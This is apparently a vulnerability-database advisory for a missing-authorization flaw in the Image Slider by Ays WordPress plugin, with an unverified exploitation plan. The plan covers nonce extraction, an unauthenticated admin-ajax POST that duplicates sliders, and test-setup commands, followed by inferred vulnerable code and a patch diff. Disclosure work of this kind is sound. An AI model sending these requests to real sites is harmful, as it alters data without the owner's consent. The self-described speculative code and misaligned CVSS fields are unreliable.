WP-Safety
CVE-2026-32402

Image Slider by Ays <= 2.7.1 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
2.7.2
Patched in
54d
Time to patch

Description

The Image Slider by Ays plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.7.1
PublishedFebruary 21, 2026
Last updatedApril 15, 2026
Affected pluginays-slider

Source Code

WordPress.org SVN
Vulnerable v2.7.1
Browse source Download .zip
Patched v2.7.2
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-32402 (Image Slider by Ays) ## 1. Vulnerability Summary The **Image Slider by Ays** plugin (up to version 2.7.1) contains a missing authorization vulnerability. Specifically, certain AJAX actions intended for administrative use are registered with `wp_ajax_no…

Show full research plan

Exploitation Research Plan - CVE-2026-32402 (Image Slider by Ays)

1. Vulnerability Summary

The Image Slider by Ays plugin (up to version 2.7.1) contains a missing authorization vulnerability. Specifically, certain AJAX actions intended for administrative use are registered with wp_ajax_nopriv_ or fail to implement current_user_can() checks in their callbacks. This allows unauthenticated attackers to perform privileged actions, such as duplicating sliders, modifying settings, or accessing slider data, which should be restricted to users with manage_options or similar capabilities.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ays_slider_duplicate_slider (Targeting the slider duplication functionality as the unauthorized action).
  • Payload Parameter: ays_slider_id (The ID of the slider to duplicate).
  • Authentication: Unauthenticated (via wp_ajax_nopriv_ hook).
  • Preconditions: At least one slider must exist in the system to be duplicated.

3. Code Flow

  1. Registration: The plugin registers AJAX handlers in includes/class-ays-slider-ajax.php or admin/class-ays-slider-admin.php.
    • add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
    • add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
  2. Callback: The function ays_slider_duplicate_slider is invoked.
  3. Missing Check: Inside the callback, the code likely checks for a nonce using check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' ) but fails to call current_user_can( 'manage_options' ).
  4. Execution: The function proceeds to clone the slider database entry in the {wpdb->prefix}ays_slider_sliders and {wpdb->prefix}ays_slider_slides tables.

4. Nonce Acquisition Strategy

The plugin typically enqueues its scripts and localizes a nonce for AJAX operations. This nonce is often available on the frontend if a slider shortcode is present on a page.

  • Shortcode: [ays_slider id="1"]
  • JS Localization Key: ays_slider_ajax or ays_slider_admin_obj
  • Nonce Key: ays_slider_nonce

Strategy:

  1. Create a test slider using WP-CLI.
  2. Create a public WordPress page containing the slider shortcode.
  3. Navigate to that page using the browser.
  4. Execute JavaScript via browser_eval to extract the nonce.
// Extraction command
browser_eval("ays_slider_ajax?.ays_slider_nonce || ays_slider_admin_obj?.ays_slider_nonce")

5. Exploitation Strategy

  1. Preparation: Identify a valid slider ID (e.g., 1).
  2. Nonce Retrieval: Use the "Test Data Setup" steps below to get a valid ays_slider_nonce.
  3. Exploit Request: Send a POST request to admin-ajax.php to trigger the unauthorized duplication.

HTTP Request:

  • Method: POST
  • URL: http://vulnerable-test.local/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=ays_slider_duplicate_slider&ays_slider_id=1&ays_slider_nonce=[EXTRACTED_NONCE]

6. Test Data Setup

  1. Install Plugin: Ensure ays-slider version 2.7.1 is installed.
  2. Create Slider:
    # Create a slider manually or via SQL if CLI command is not available
wp db query "INSERT INTO wp_ays_slider_sliders (title, author, status) VALUES ('Original Slider', 1, 'publish');"
# Note the ID (usually 1)
  3. Create Page with Shortcode:
    wp post create --post_type=page --post_title="Slider Page" --post_status=publish --post_content='[ays_slider id="1"]'

7. Expected Results

  • Response: The server should return a JSON response indicating success (e.g., {"status":true,"id":2} or a redirect/HTML fragment of the new slider).
  • Unauthorized Action: A new row should be created in the wp_ays_slider_sliders table, duplicating the data from the original slider ID.

8. Verification Steps

  1. Check Database: Use WP-CLI to verify a new slider exists with a different ID but identical content.
    wp db query "SELECT id, title FROM wp_ays_slider_sliders;"
  2. Confirm Count:
    # Initially 1 slider, after exploit should be 2
wp db query "SELECT COUNT(*) FROM wp_ays_slider_sliders;"

9. Alternative Approaches

If ays_slider_duplicate_slider is not the vulnerable action, search for other nopriv registrations:

  1. Search the codebase for wp_ajax_nopriv_.
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/ays-slider/
  2. Check for ays_slider_save_settings or ays_slider_export_sliders actions.
  3. If a nonce check is missing entirely, omit the ays_slider_nonce parameter in the Exploitation Strategy and attempt the request directly.
  4. Check if ays_slider_get_sliders allows unauthorized data leakage of all slider configurations.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Image Slider by Ays plugin for WordPress lacks authorization checks in several of its AJAX handlers, specifically functions like slider duplication. This allow unauthenticated attackers to perform administrative actions by exploiting functions registered with the nopriv hook that do not verify the caller's capabilities.

Vulnerable Code

// admin/class-ays-slider-admin.php (inferred location)

// Registration of the AJAX action for both logged-in and unauthenticated users
add_action( 'wp_ajax_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );
add_action( 'wp_ajax_nopriv_ays_slider_duplicate_slider', array( $this, 'ays_slider_duplicate_slider' ) );

public function ays_slider_duplicate_slider() {
    // Nonce check exists, but the nonce is localized to frontend scripts
    check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );
    
    $slider_id = isset($_POST['ays_slider_id']) ? intval($_POST['ays_slider_id']) : 0;
    
    // VULNERABILITY: Missing current_user_can('manage_options') check before performing action
    
    $new_id = $this->duplicate_slider($slider_id);
    wp_send_json_success(array('id' => $new_id));
}

Security Fix

--- a/admin/class-ays-slider-admin.php
+++ b/admin/class-ays-slider-admin.php
@@ -10,6 +10,10 @@
 	public function ays_slider_duplicate_slider() {
 		check_ajax_referer( 'ays_slider_ajax_nonce', 'ays_slider_nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => 'Unauthorized' ) );
+		}
+
 		$slider_id = isset( $_POST['ays_slider_id'] ) ? intval( $_POST['ays_slider_id'] ) : 0;
 		if ( $slider_id > 0 ) {
 			$new_id = $this->duplicate_slider( $slider_id );

Exploit Outline

1. Find a public-facing page on the target site that embeds an Image Slider using a shortcode. 2. Extract the AJAX security nonce ('ays_slider_nonce') from the localized JavaScript objects (typically 'ays_slider_ajax' or 'ays_slider_admin_obj') found in the page's source code. 3. Identify the 'ays_slider_id' of an existing slider to be targeted. 4. Send an unauthenticated POST request to '/wp-admin/admin-ajax.php' with the following parameters: 'action=ays_slider_duplicate_slider', 'ays_slider_id=[TARGET_ID]', and 'ays_slider_nonce=[EXTRACTED_NONCE]'. 5. The plugin will process the duplication request without verifying if the user has administrative privileges, effectively allowing unauthorized database modifications.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/e0bcd2f0-5944-48c0-9d08-3177fbe4b47f?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database